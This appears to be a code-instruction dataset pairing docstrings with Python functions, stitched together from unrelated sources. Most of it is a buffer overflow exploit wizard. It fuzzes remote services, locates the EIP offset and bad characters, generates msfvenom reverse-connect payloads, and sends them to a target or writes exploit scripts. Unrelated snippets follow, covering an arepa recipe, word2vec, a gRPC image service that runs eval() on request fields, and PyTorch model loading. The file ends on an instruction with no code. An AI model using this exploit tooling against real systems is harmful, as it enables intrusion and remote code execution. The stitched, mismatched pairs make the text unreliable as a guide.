╚═╗││││├─┘│ ├┤ + ╚═╝┴┴ ┴┴ ┴─┘└─┘ + ▄▄▄▄ ▒█████ + ▓█████▄ ▒██▒ ██▒ + ▒██▒ ▄██▒██░ ██▒ + ▒██░█▀ ▒██ ██░ + ░▓█ ▀█▓░ ████▓▒░ + ░▒▓███▀▒░ ▒░▒░▒░ + ▒░▒ ░ ░ ▒ ▒░ + ░ ░ ░ ░ ░ ▒ * + ░ ░ ░ *° + *°` + ╦ ╦┬┌─┐┌─┐┬─┐┌┬┐ *°`` + ║║║│┌─┘├─┤├┬┘ ││ (´***°``) + ╚╩╝┴└─┘┴ ┴┴└──┴┘ ```*´´´ + This wizards helps you getting +started with simple buffer overflows. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~{} +'''.format(CYAN, FORMAT_END)) +[INST] Prints the buffer overflow types to the screen and stores the users selection. [/INST] def select_bo_type(): + show_prompt_text('Select type of buffer overflow:') + show_prompt_text('[ L ] Local buffer overflow', False) + show_prompt_text(' {} = Open a malicious file in an application {}'.format(GRAY, FORMAT_END), False) + show_prompt_text('[ R ] Remote buffer overflow', False) + show_prompt_text(' {} = Send a malicious request via TCP to an application {}'.format(GRAY, FORMAT_END), False) + user_input = get_input(bo_type_valid) + global bo_type + bo_type = 'local' if user_input in ['l', 'loc', 'local'] else 'remote' +[INST] We will increasing payloads and send them to the application to find out at which length a buffer overflow occurs. [/INST] def step_fuzzing(): + global current_step + current_step = 0 + show_step_banner('[0] Fuzzing') + if bo_type == 'local': + show_prompt_text('Enter file extension:') + user_input = get_input(ext_valid) + global file_ext + global file + file_ext = user_input + file = file_name + '.' + file_ext if file_ext else file_name + print('\n{} files with increasing size will be generated. 
The following settings will be used:\n'.format( + fuzz_buff_length)) + settings = [desc_file_ext(), desc_fuzz_buff_length(), desc_fuzz_char(), desc_increase_step(), + desc_start_command(), desc_end_command()] + elif bo_type == 'remote': + show_prompt_text('Enter target IP:') + user_input = get_input(ip_valid) + global target + target = user_input + show_prompt_text('Enter target port:') + user_input = get_input(port_valid) + global port + port = int(user_input) + print('\nA fuzzing file will be generated. The following settings will be used:\n') + settings = [desc_target(), desc_port(), desc_fuzz_buff_length(), desc_fuzz_char(), + desc_increase_step(), desc_start_command(), desc_end_command()] + show_settings(settings) + if proceed_ok(): + if bo_type == 'local': + dump_local_fuzz() + elif bo_type == 'remote': + dump_remote_fuzz() + run_remote_fuzzing() + step_pattern() +[INST] Based on the buffer length determined through fuzzing (previous step), we will create and send +a unique pattern which will help us finding the offset. [/INST] def step_pattern(): + global current_step + current_step = 1 + show_step_banner('[1] Finding offset') + show_prompt_text('Enter the length at which the application/service crashed:') + user_input = get_input(number_valid) + global pattern_length + pattern_length = int(user_input) - len(start_command) - len(end_command) + global buf_length + buf_length = int(user_input) + tmp_file = 'pattern.txt' + command = 'msf-pattern_create -l {} > {}'.format(pattern_length, tmp_file) + thread = call_command(command) + while thread.running(): + animation('Creating pattern') + if thread.result() == 0: + print() + with open(tmp_file, 'r') as f: + pattern = f.read().splitlines()[0].encode() + global buffer + buffer = buffer_list.get_buffer_by_name('pattern').get_buffer(pattern) + os.unlink(tmp_file) + print('The exploit file will be generated. The following settings will be used:\n') + if bo_type == 'local': + settings = [desc_pattern(), desc_start_command(), desc_end_command()] + show_settings(settings) + if proceed_ok(): + dump_local_exploit() + print(' Load file into vulnerable application and check which pattern is shown in EIP on crash.') + elif bo_type == 'remote': + settings = [desc_target(), desc_port(), desc_pattern(), desc_start_command(), desc_end_command()] + show_settings(settings) + if proceed_ok(): + dump_remote_exploit() + run_remote_exploit() + step_offsets() +[INST] In the offset step, the user enters the value that overwrites EIP. +By comparing this value to the pattern (previous step), the offset can be determined. +We will then build a custom payload that places Bs in the EIP. +The user must then check in the debugger whether the offset has been calculated properly.. [/INST] def step_offsets(): + global current_step + current_step = 2 + show_step_banner('[2] Checking offsets') + show_prompt_text('Enter the 8 characters that are shown in the EIP:') + user_input = get_input(pattern_valid) + tmp_file = 'offset.txt' + command = 'msf-pattern_offset -q {} > {}'.format(shlex.quote(user_input), tmp_file) + thread = call_command(command) + while thread.running(): + animation('Finding offset') + if thread.result() == 0: + print() + with open(tmp_file, 'r') as f: + result = f.read() + try: + global offset + offset = int(result.split(' ')[-1]) + print_info('Offset at ' + str(offset)) + except (ValueError, IndexError): + print_error('Could not find string in pattern. 
Maybe the exploit did not work?') + print_info('You could return to step [1] and try increasing the length.') + os.unlink(tmp_file) + valid_step = False + while not valid_step: + show_prompt_text('With which step do you want to proceed?') + user_input = get_input(number_valid) + if set_step(user_input): + valid_step = True + os.unlink(tmp_file) + show_prompt_text('Enter the 8 characters that are shown at the top of stack:') + user_input = get_input(pattern_valid) + tmp_file = 'offset.txt' + command = 'msf-pattern_offset -q {} > {}'.format(shlex.quote(user_input), tmp_file) + thread = call_command(command) + while thread.running(): + animation('Finding offset') + if thread.result() == 0: + print() + with open(tmp_file, 'r') as f: + result = f.read() + try: + stack_offset = int(result.split(' ')[-1]) + print_info('Offset at ' + str(stack_offset)) + global nop_sled + off_stack_dist = stack_offset - offset + if off_stack_dist > nop_sled: + nop_sled = off_stack_dist + except (ValueError, IndexError): + print_info('Could not find string in pattern. ' + 'Seems that the overflow did not overwrite the stack. We will deal with that later.') + os.unlink(tmp_file) + global buffer + buffer = buffer_list.get_buffer_by_name('generic').get_buffer() + if bo_type == 'local': + dump_local_exploit() + elif bo_type == 'remote': + update_remote_exploit() + run_remote_exploit() + print( + ' Does the EIP show 42424242? If not, something is wrong with the offset and you should repeat the previous steps.') + print_info('Write the address down where the Cs start. You can use it later to find bad characters with mona.') + if proceed_ok(): + step_badchars() +[INST] In the badchar step an ASCII string is repeatedly passed as payload. +The user has to examine the result in a debugger and enter the characters that break the exploit. +These characters are stored and will be considered later when creating the real payload.. [/INST] def step_badchars(): + global current_step + current_step = 3 + show_step_banner('[3] Finding bad characters') + print_info('You must probably repeat this step multiple times until you have found all bad characters.') + print('''{} + In Immunity Debugger, you can use mona to find the bad characters. To do so, do the following before running the exploit: + 1. Set up working directory: !mona config -set workingfolder c:\\mona\\%p + 2. Create byte array: !mona bytearray + {}'''.format(GRAY, FORMAT_END)) + all_chars_found = False + while not all_chars_found: + global buffer + buffer = buffer_list.get_buffer_by_name('badcharc').get_buffer() + if bo_type == 'local': + dump_local_exploit() + elif bo_type == 'remote': + update_remote_exploit() + run_remote_exploit() + print('\n Can you see all Cs when following ESP or EAX in dump (depending on where the Cs are stored)?') + print('''{} + In Immunity Debugger, you can use mona to find the bad characters. + To do so, do the following before resending the exploit: + 1. Compare: !mona compare -f c:\\mona\\\\bytearray.bin -a
+ 2. Recreate byte array: !mona bytearray -cpb "{}" + {}'''.format(GRAY, '\\x' + '\\x'.join(c for c in badchars), FORMAT_END)) + show_prompt_text('Enter the character (e.g. 00, 0a, 0d) which does not show up or breaks the exploit') + show_prompt_text('To show all possible ascii characters enter {}show ascii{}'.format(BOLD, FORMAT_END)) + show_prompt_text('Leave empty / press Enter when there a no more bad characters.') + user_input = get_input(bad_char_valid) + if user_input == '': + all_chars_found = True + else: + char = unhexlify(user_input) + global char_string + char_string = char_string.replace(char, b'') + badchars.append(user_input) + step_return() +[INST] By examining the buffer overflow, we can determine where to put the payload and which command to use to access it. [/INST] def step_return(): + global current_step + current_step = 4 + show_step_banner('[4] Finding return address') + show_prompt_text('Examine the buffer overflow in the debugger. Which case does apply?') + buf_types = buffer_list.get_selectable_buffers() + for b in buf_types: + show_prompt_text('[ ' + str(b.id) + ' ] ' + b.select_text, False) + while True: + user_input = int(get_input(number_valid)) + if 0 <= user_input < len(buf_types): + break + print_warning('The number you entered is invalid') + selected = buffer_list.get_buffer_by_id(user_input) + selected.get_input() + global buffer + buffer = selected.get_buffer() + if bo_type == 'local': + dump_local_exploit() + elif bo_type == 'remote': + update_remote_exploit() + run_remote_exploit() + print(' Check if everything is where it should be. If not, repeat previous steps.') + if proceed_ok(): + step_payload() +[INST] We define the type of payload we wish to send and create the final exploit file.. [/INST] def step_payload(): + global current_step + current_step = 5 + show_step_banner('[5] Creating payload') + global connect_ip + show_prompt_text('Enter your IP (hit Enter to use current value {}):'.format(connect_ip)) + user_input = get_input(ip_valid) + if user_input != '': + connect_ip = user_input + global connect_port + show_prompt_text('Enter the port to listen on (hit Enter to use current value {}):'.format(connect_port)) + user_input = get_input(port_valid) + if user_input != '': + connect_port = user_input + global arch + show_prompt_text('Enter the target architecture (hit Enter to use current value {}):'.format(arch)) + user_input = get_input(arch_valid) + if user_input != '': + arch = 'x' + user_input + global platform + show_prompt_text('Enter the target platform (hit Enter to use current value {}):'.format(platform)) + user_input = get_input(platform_valid) + if user_input != '': + platform = user_input + global payload + while True: + show_prompt_text('Enter payload type'.format(payload)) + show_prompt_text('Show all available with {}show payloads{}'.format(BOLD, FORMAT_END)) + user_input = get_input(payload_valid) + if user_input == 'show payloads': + show_payloads() + continue + else: + payload = user_input + payload_ok = create_payload() + if payload_ok and bo_type == 'local': + dump_local_exploit() + elif payload_ok and bo_type == 'remote': + update_remote_exploit() + run_remote_exploit() + show_prompt_text('Did your exploit work? If not, try sending a different payload.') + show_prompt_text( + 'Enter {}again{} to try again. 
Hit Enter if everything worked fine.'.format(BOLD, FORMAT_END)) + user_input = get_input(check_text) + if user_input == '': + break + else: + continue + get_input(generic_check) +[INST] Creates a payload with msfvenom and updates the buffer. [/INST] def create_payload(): + tmp_file = 'payload.py' + payload_size = buffer_list.selected_buffer.payload_size + command = "msfvenom -a {arch} --platform {plat} -p {pay} LHOST={host} LPORT={port} EXITFUNC=thread -s {size} -b '{bad}' -f py -v payld -o {file}".format( + arch=shlex.quote(arch), + plat=shlex.quote(platform), + pay=shlex.quote(payload), + host=connect_ip, + port=connect_port, + size=payload_size, + bad='\\x' + '\\x'.join(str(char) for char in badchars), + file=tmp_file) + print_info("Executing command: " + command) + thread = call_command(command) + while thread.running(): + animation('Creating payload') + if thread.result() == 0: + print() + from payload import payld + global payload_code + payload_code = payld + shutil.rmtree('__pycache__', ignore_errors=True) + global buffer + buffer = buffer_list.selected_buffer.get_buffer() + print_info('Buffer has been updated with new payload') + if len(payload_code) > payload_size: + print_warning( + "The payload was generated as small as possible. However, it is larger than the specified payload size.\n" + "The exploit probably still works fine, but don't be surprised if problems occur.") + return True + else: + print('\n') + print_warning('Something went wrong when creating the payload. Check if you have entered a valid payload.') + print_info('To create a new payload use {}set payload {}'.format(BOLD, FORMAT_END)) + return False +[INST] Accepts certain string variants for local / remote. [/INST] def bo_type_valid(user_input): + if user_input in ['l', 'r', 'loc', 'rem', 'local', 'remote']: + return True + print_error("Invalid buffer overflow type. Only 'local' or 'remote' are possible.") + return False +[INST] Accepts a string with a maximum length of 20 as file extension. [/INST] def ext_valid(user_input): + if user_input.startswith('.') or len(user_input) > 20 or ' ' in user_input: + print_error("Invalid input. Enter the extension without preceding dot. Maximum length is 20.") + return False + return True +[INST] Accepts a string with a valid IP address. [/INST] def ip_valid(user_input): + if user_input == '': + return True + ip_regex = re.compile( + r'^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$') + return re.match(ip_regex, user_input) +[INST] Accepts an integer within the number range for ports. [/INST] def port_valid(user_input): + if user_input == '': + return True + try: + port_no = int(user_input) + if 0 <= port_no <= 65535: + return True + else: + print_error("Invalid port number.") + return False + except ValueError: + print_error("Invalid port number.") + return False +[INST] The Metasploit pattern is alphanumeric, and so is the EIP value. [/INST] def pattern_valid(user_input): + if len(user_input) == 8 and user_input.isalnum(): + return True + print_error("Invalid pattern. The pattern must be an 8-character hex value.") + return False +[INST] Accepts an alphanumeric value of length 2 or no input (= Enter). [/INST] def bad_char_valid(user_input): + if user_input == '': + return True + if len(user_input) == 2 and user_input.isalnum(): + try: + int(user_input, 16) + return True + except ValueError: + return False + print_error("Invalid character. 
Enter the hex value: 00 0a etc.") + return False +[INST] Accepts a memory location: 8-bit hex value. [/INST] def address_valid(user_input): + if len(user_input) == 8: + try: + int(user_input, 16) + return True + except ValueError: + return False + print_error("Invalid memory address. Must be an 3-bit hex value.") + return False +[INST] Accepts a string matching the basic format 'platform/payload. [/INST] def payload_valid(user_input): + if len(user_input.split('/')) >= 2 or user_input == 'show payloads' or user_input == '': + return True + print_error("Invalid payload. Use 'show payloads' to show valid payloads.") + return False +[INST] Msfvenom platforms are words with a maximum length of 10. [/INST] def platform_valid(user_input): + if (len(user_input) <= 10 and user_input.isalpha()) or user_input == '': + return True + print_error("Invalid platform type") + return False +[INST] Accepts any string without numbers or special characters. [/INST] def check_text(user_input): + if user_input.isalpha() or user_input == '': + return True + print_error("Invalid input") + return False +[INST] Requires the user to hit enter to proceed. [/INST] def proceed_ok(): + show_prompt_text('Press Enter to proceed.') + if get_input(check_enter) == '': + return True + return False +[INST] Prints the currently set values of all parameters. [/INST] def show_options(): + dash = '-' * 77 + header = ['Name', 'Current setting', 'Required', 'Description'] + options = [ + [ + ['Global parameters'], + desc_bo_type(), + desc_start_command(), + desc_end_command() + ], + [ + ['Local buffer overflow parameters'], + desc_file_name(), + desc_file_ext() + ], + [ + ['Remote buffer overflow parameters'], + desc_target(), + desc_port() + ], + [ + ['Fuzzing'], + desc_fuzz_buff_length(), + desc_increase_step(), + desc_fuzz_char() + ], + [ + ['Buffer'], + desc_pattern(), + desc_buf_length(), + desc_offset(), + desc_badchars(), + desc_nop_sled(), + desc_nop_padding(), + desc_return_address() + ], + [ + ['Payload'], + desc_payload(), + desc_arch(), + desc_platform(), + desc_connect_ip(), + desc_connect_port() + ] + ] + print(BOLD, GRAY) + print('{:<15s}{:<20}{:<15s}{:<30s}'.format(header[0], header[1], header[2], header[3])) + print(dash, FORMAT_END) + for item in options: + for index, value in enumerate(item): + if index == 0: + print(BOLD, GRAY) + print(value[0].upper(), FORMAT_END) + else: + print('{:<15s}{:<20}{:<15s}{:<30s}'.format(value[0], value[1], value[2], value[3])) + print('\n') +[INST] Shows parameters and their currently set values. [/INST] def show_settings(settings): + header = ['Parameter', 'Current setting', 'Description'] + print('{}{}{:<15s}{:<20}{:<30s}{}'.format(BOLD, GRAY, header[0], header[1], header[2], FORMAT_END)) + for item in settings: + print('{}{:<15s}{:<20}{:<30s}{}'.format(GRAY, item[0], item[1], item[3], FORMAT_END)) + print('\nIf you wish to change these settings, enter {}set {}\n'.format(BOLD, FORMAT_END)) +[INST] Displays all steps of the wizard and marks the currently selected step. 
[/INST] def show_steps(): + print('\nThe wizard guides you through the following steps:') + steps = ['Fuzzing', + 'Send pattern to find offset for EIP', + 'Check offsets', + 'Check bad characters', + 'Check return address', + 'Create payload'] + for index, value in enumerate(steps): + if index == current_step: + print('{}=>[{}] {} {}'.format(CYAN, index, value, FORMAT_END)) + else: + print('{} [{}] {} {}'.format(GRAY, index, value, FORMAT_END)) + print('The prompt shows your current step.') + print('You can switch between steps at any time with {}set step {}\n'.format(BOLD, FORMAT_END)) +[INST] Shows all payloads available in Metasploit based on the current values for architecture and platform. [/INST] def show_payloads(): + tmp_file = 'payloads.txt' + command = 'msfvenom -l payloads > {}'.format(tmp_file) + thread = call_command(command) + while thread.running(): + animation('Searching payloads in msfvenom') + if thread.result() == 0: + print() + with open(tmp_file, 'r') as f: + for line in f: + splitted = line.split(' ') + if len(splitted) > 5: + name = splitted[4] + if platform in name: + if arch == 'x86' and 'x64' not in name: + print(name) + elif arch == 'x64' and 'x86' not in name: + print(name) + os.unlink(tmp_file) +[INST] Shows all ASCII characters in a matrix (helps finding bad chars). [/INST] def show_ascii(): + hexed = char_string.hex() + listed = [hexed[i:i + 2] for i in range(0, len(hexed), 2)] + cols = 16 + lines = (" ".join(listed[i:i + cols]) for i in range(0, len(listed), cols)) + print('\n') + print('\n'.join(lines)) +[INST] Asks the user if the remote exploit should be run automatically. [/INST] def run_remote_exploit(): + show_prompt_text('You can check and run the exploit file manually or press Enter to let the wizard run it.') + show_prompt_text('Enter "skip" to proceed without running the file.', False) + if get_input(check_text) == 'skip': + return + else: + send_exploit() +[INST] Sends a request with the payload for a remote buffer overflow. [/INST] def send_exploit(): + try: + with so.socket(so.AF_INET, so.SOCK_STREAM) as s: + s.settimeout(5) + print_info('Connecting to {}'.format(target)) + connect = s.connect_ex((target, port)) + if connect != 0: + print_error('Connection failed') + return + try: + try: + print('[*] Received response: ' + str(s.recv(1024))) + except so.timeout: + pass + print_info('Sending evil request with {} bytes'.format(len(buffer))) + s.send(buffer) + print_success('Done') + except so.timeout: + print_error('Connection failed due to socket timeout') + except (BrokenPipeError, ConnectionResetError): + print_error('The connection was closed while sending the payload') +[INST] Asks the user if the remote exploit should be run automatically. [/INST] def run_remote_fuzzing(): + show_prompt_text('You can check and run the fuzzing file manually or press Enter to let the wizard run it.') + show_prompt_text('Enter "skip" to proceed without running the file.', False) + if get_input(check_text) == 'skip': + return + else: + send_fuzzing() + print_info('Fuzzing finished') +[INST] Sends requests with increasing payloads to cause a remote buffer overflow. 
[/INST] def send_fuzzing(): + build_fuzz_buffer() + try: + for item in fuzz_buffer: + with so.socket(so.AF_INET, so.SOCK_STREAM) as s: + s.settimeout(5) + print_info('Connecting to ' + target) + connect = s.connect_ex((target, port)) + if connect != 0: + print_error('Connection failed') + return + try: + try: + print('[*] Received response: ' + str(s.recv(1024))) + except so.timeout: + pass + command = start_command + item + end_command + print_info('Fuzzing with {} bytes'.format(len(command))) + s.send(command) + try: + print('[*] Received response: ' + str(s.recv(1024))) + except so.timeout: + pass + print_success('Done') + except so.timeout: + print_error('Connection failed due to socket timeout.') + return + except (BrokenPipeError, ConnectionResetError): + print_error('The connection was closed while sending the payload') +[INST] Creates a file with the payload for a local buffer overflow. [/INST] def dump_local_exploit(): + global file + global buffer + try: + with open(file, 'wb') as f: + f.write(buffer) + print_success('Created / modified file with length {}'.format(len(buffer))) + except OSError as ex: + print_error('Error while creating the exploit file:\n {}'.format(ex.strerror)) +[INST] Writes a python file with the exploit based on the currently set parameters. [/INST] def dump_remote_exploit(): + global file + content = """\ +#!/usr/bin/python3 +import socket as so +# --- Define target ------------------------ +target = '{target}' +port = {port} +# ------------------------------------------ +# --- Define exploit ------------------------ +buf_length = {buffer_length} +offset = {off} +{buffer_code} +# ------------------------------------------ +with so.socket(so.AF_INET, so.SOCK_STREAM) as s: + try: + s.settimeout(5) + print(' [*] Connecting to', target) + connect = s.connect_ex((target, port)) + # Stop script if connection cannot be established + if connect != 0: + print('[!] Connection failed') + exit(1) + # Connection established: send request + try: + # Catch initial response if any + try: + print('[*] Received response: ' + str(s.recv(1024))) + except so.timeout: + pass + print(' [*] Sending evil request with', len(buffer), 'bytes') + s.send(buffer) + print('[*] Done') + # Stop on timeout + except so.timeout: + print('[!] Connection failed due to socket timeout.') + exit(1) + except (BrokenPipeError, ConnectionResetError): + print('[!] The connection was closed while sending the payload') +""".format(target=target, + port=port, + buffer_length=buf_length, + off=offset, + buffer_code=buffer_list.selected_buffer.print_buffer()) + try: + with open(file, 'wb') as f: + f.write(content.encode()) + print_success('Created exploit file {}'.format(file)) + except OSError as ex: + print_error('Error while creating the exploit file:\n {}'.format(ex.strerror)) +[INST] Updates only the buffer in an existing exploit file. +Manual changes in other parts of the file will be retained.. 
[/INST] def update_remote_exploit(): + try: + with FileInput(files=[file], inplace=True) as f: + for line in f: + line = line.rstrip() + if line.startswith('offset = '): + line = "offset = " + str(offset) + elif line.startswith('buffer = '): + line = buffer_list.selected_buffer.print_buffer() + elif line.startswith('buffer += ') or len(line) == 0: + continue + print(line) + print_success('Updated buffer in exploit file {}'.format(file)) + except OSError as ex: + print_error('Error while updating the exploit file:\n {}'.format(ex.strerror)) +[INST] Generates the buffer for fuzzing based on the currently set parameters for +fuzz_length, fuzz_increase and fuzz_char. [/INST] def build_fuzz_buffer(): + counter = increase_step - len(start_command) - len(end_command) + while len(fuzz_buffer) <= fuzz_buff_length: + fuzz_buffer.append(fuzz_char * counter) + counter = counter + increase_step +[INST] Writes files with increasing size for fuzzing. [/INST] def dump_local_fuzz(): + build_fuzz_buffer() + for item in fuzz_buffer: + filename = file_name + '_' + str(len(item)) + '.' + file_ext + with open(filename, 'wb') as f: + f.write(start_command + item + end_command) + print_info('Created fuzzing file with length ' + str(len(item))) +[INST] Writes a python file for fuzzing based on the currently set parameters for fuzz_length, fuzz_increase and fuzz_char. [/INST] def dump_remote_fuzz(): + filename = 'fuzzing.py' + content = '''\ +#!/usr/bin/python3 +import socket as so +# --- Define target ------------------------ +target = '{target}' +port = {port} +# ------------------------------------------ +# --- Build fuzzing buffer ----------------- +fuzz_buffer = [] +counter = {step} - len({cmd}) - len({ecmd}) +while len(fuzz_buffer) <= {buff_len}: + fuzz_buffer.append({char}*counter) + counter = counter + {step} +# ------------------------------------------ +for item in fuzz_buffer: + with so.socket(so.AF_INET, so.SOCK_STREAM) as s: + try: + s.settimeout(5) + print(' [*] Connecting to', target) + connect = s.connect_ex((target, port)) + # Stop script if connection cannot be established + if connect != 0: + print('[!] Connection failed') + exit(1) + # Connection established: send request + try: + # Catch initial response if any + try: + print('[*] Received response: ' + str(s.recv(1024))) + except so.timeout: + pass + command = {cmd} + item + {ecmd} + print(' [*] Fuzzing with', len(command), 'bytes') + s.send(command) + try: + print('[*] Received response: ' + str(s.recv(1024))) + except so.timeout: + pass + print('[*] Done') + # Stop on timeout + except so.timeout: + print('[!] Connection failed due to socket timeout.') + exit(1) + except (BrokenPipeError, ConnectionResetError): + print('[!] The connection was closed while sending the payload') + exit(1) +'''.format(target=target, + port=port, + step=increase_step, + buff_len=fuzz_buff_length, + char=fuzz_char, + cmd=start_command, + ecmd=end_command) + try: + with open(filename, 'w') as f: + f.write(content) + print_success('Created fuzzing file {}'.format(filename)) + except OSError as ex: + print_error('Error while creating the fuzzing file:\n {}'.format(ex.strerror)) +[INST] Prints ingredients for making `count` arepas. +F-string of original code. [/INST] def ingredients(count): + print(f'{count*0.1} cups arepa flour') + print(f'{count*0.1} cups cheese') + print(f'{count*0.025} cups water') +[INST] Train the word2vec model for document vector representation.. 
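To make the size arithmetic in build_fuzz_buffer above concrete, here is a standalone sketch; the 'OVERFLOW ' prefix, CRLF suffix and step size are illustrative values, not taken from the original settings.

def build_fuzz_payloads(buff_count, increase_step, fuzz_char=b'A',
                        start_command=b'OVERFLOW ', end_command=b'\r\n'):
    # The first payload is padded so that command + filler + terminator equals
    # increase_step bytes; each following payload grows by increase_step bytes.
    payloads = []
    counter = increase_step - len(start_command) - len(end_command)
    while len(payloads) <= buff_count:
        payloads.append(fuzz_char * counter)
        counter += increase_step
    return payloads

for item in build_fuzz_payloads(buff_count=4, increase_step=100):
    print(len(b'OVERFLOW ' + item + b'\r\n'))  # 100, 200, 300, 400, 500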
[/INST] def fit(self, X, y=None): + self.sentences = X + self.word2vec = gensim.models.Word2Vec(MySentences(self.sentences), *self.args, **self.kwargs) + self.model = dict(zip(self.word2vec.wv.index2word, self.word2vec.wv.vectors)) + tfidf = TfidfVectorizer(analyzer=lambda x: x) + tfidf.fit(X) + max_idf = max(tfidf.idf_) + self.word2weight = defaultdict( + lambda: max_idf, + [(w, tfidf.idf_[i]) for w, i in tfidf.vocabulary_.items()] + ) + return self +[INST] Transform a sequence of documents to vectors.. [/INST] def transform(self, X, y=None): + return np.array([ + np.mean([self.model[w] * self.word2weight[w] + for w in words if w in self.model] or + [np.random.rand(self.size)], axis=0) + for words in MySentences(X) + ]) +[INST] Combine `fit` and `transform` functions. +It trains the model on the given data then transforming +and returning the training data into vectors.. [/INST] def fit_transform(self, X, y=None): + temp = self.fit(X) + return temp.transform(X) +[INST] Treats gRPC inputs and assembles lua command. Specifically, checks if required field have been specified, +if the values and types are correct and, for each input/input_type adds the argument to the lua command.. [/INST] def treat_inputs(self, request, arguments, created_images): + model_path = self.model_dir + file_index_str = "" + image_path = "" + for field, values in arguments.items(): + default = values[2] + try: + arg_value = eval("request.{}".format(field)) + except Exception as e: + log.error(e) + return False + print("Received request.{} = ".format(field)) + print(arg_value) + if field == "input": + log.debug("Treating input image field.") + assert(request.input != ""), "Input image field should not be empty." + try: + image_path, file_index_str = \ + service.treat_image_input(arg_value, self.input_dir, "{}".format(field)) + print("Image path: {}".format(image_path)) + created_images.append(image_path) + except Exception as e: + log.error(e) + raise + elif field == "model": + log.debug("Treating model field. Forcing model to be ESRGAN.") + model_path += self.esrgan_model + elif field == "scale": + log.debug("Treating scale field. Forcing scale to be 4.") + scale = 4 + model_path += str(scale) + else: + log.error("Request field not found.") + return False + if image_path == "": + log.error("Empty image_path (filename). Something went wrong when treating input.") + model_path += self.model_suffix + log.debug("Successfully treated input.") + return image_path, model_path, file_index_str +[INST] Increases the resolution of a given image (request.image). 
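A rough, dependency-light sketch of the TF-IDF-weighted word-vector averaging that fit() and transform() above implement; the toy word vectors and corpus are invented, and gensim is deliberately left out so only the weighting step is shown.

import numpy as np
from collections import defaultdict
from sklearn.feature_extraction.text import TfidfVectorizer

# Toy pre-trained word vectors (in the class above these come from gensim's Word2Vec).
word_vecs = {
    'cat': np.array([1.0, 0.0]),
    'dog': np.array([0.0, 1.0]),
    'pet': np.array([0.5, 0.5]),
}
docs = [['cat', 'pet'], ['dog', 'pet'], ['cat', 'dog', 'pet']]

# Fit TF-IDF on already-tokenized documents, mirroring analyzer=lambda x: x in fit().
tfidf = TfidfVectorizer(analyzer=lambda x: x)
tfidf.fit(docs)
max_idf = max(tfidf.idf_)
word2weight = defaultdict(lambda: max_idf,
                          [(w, tfidf.idf_[i]) for w, i in tfidf.vocabulary_.items()])

# Document vector = mean of (word vector * idf weight) over words with a known vector.
doc_vectors = np.array([
    np.mean([word_vecs[w] * word2weight[w] for w in doc if w in word_vecs], axis=0)
    for doc in docs
])
print(doc_vectors.shape)  # (3, 2)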
[/INST] def increase_image_resolution(self, request, context): + created_images = [] + arguments = {"input": ("image", True, None), + "model": ("string", True, None), + "scale": ("int", False, 4)} + try: + image_path, model_path, file_index_str = self.treat_inputs(request, arguments, created_images) + except HTTPError as e: + error_message = "Error downloading the input image \n" + e.read() + log.error(error_message) + self.result.data = error_message + return self.result + except Exception as e: + log.error(e) + self.result.data = e + return self.result + log.debug("Treated input.") + with Pool(1) as p: + try: + output = p.apply(_increase_image_resolution, (model_path, image_path)) + except Exception as e: + log.error(e) + self.result.data = e + return self.result + log.debug("Returning on service complete!") + input_filename = os.path.split(created_images[0])[1] + log.debug("Input file name: {}".format(input_filename)) + output_image_path = self.output_dir + '/' + input_filename + log.debug("Output image path: {}".format(output_image_path)) + try: + cv2.imwrite(output_image_path, output) + created_images.append(output_image_path) + except Exception as e: + log.error("Error writing output image to file.") + log.error(e) + self.result.data = e + return self.result + if input_filename.split('.')[1] == 'png': + log.debug("Encoding from PNG.") + self.result.data = service.png_to_base64(output_image_path).decode("utf-8") + else: + log.debug("Encoding from JPG.") + self.result.data = service.jpg_to_base64(output_image_path, open_file=True).decode("utf-8") + log.debug("Output image generated. Service successfully completed.") + for image in created_images: + service.serviceUtils.clear_file(image) + return self.result +[INST] The gRPC serve function. +Params: +max_workers: pool of threads to execute calls asynchronously +port: gRPC server port + +Add all your classes to the server here. +(from generated .py files by protobuf compiler). [/INST] def serve(max_workers=5, port=7777): + server = grpc.server(futures.ThreadPoolExecutor(max_workers=max_workers)) + grpc_bt_grpc.add_SuperResolutionServicer_to_server( + SuperResolutionServicer(), server) + server.add_insecure_port('[::]:{}'.format(port)) + log.debug("Returning server!") + return server +[INST] Load the PyTorch model from the `model_dir` directory.. [/INST] def model_fn(model_dir): + print("Loading model.") + model_info = {} + model_info_path = os.path.join(model_dir, 'model_info.pth') + with open(model_info_path, 'rb') as f: + model_info = torch.load(f) + print("model_info: {}".format(model_info)) + device = torch.device("cuda" if torch.cuda.is_available() else "cpu") + INPUT_DIM = model_info['INPUT_DIM'] + WORD_EMBEDDING_DIM = model_info['WORD_EMBEDDING_DIM'] + N_FILTERS = model_info['N_FILTERS'] + FILTER_SIZES = model_info['FILTER_SIZES'] + AUTHOR_DIM = model_info['AUTHOR_DIM'] + DROPOUT = model_info['DROPOUT'] + PAD_IDX = model_info['PAD_IDX'] + model = CNN(INPUT_DIM, WORD_EMBEDDING_DIM, N_FILTERS, FILTER_SIZES, \ + AUTHOR_DIM, DROPOUT, PAD_IDX) + model_path = os.path.join(model_dir, 'model_state.pt') + with open(model_path, 'rb') as f: + model.load_state_dict(torch.load(f)) + word_dict_path = os.path.join(model_dir, 'word_dict.pkl') + with open(word_dict_path, 'rb') as f: + model.word_dict = pickle.load(f) + model.to(device).eval() + print("Done loading model.") + return model, model_info['TRAIN_HISTORY'] +[INST] Load the PyTorch model from the `model_dir` directory.. 
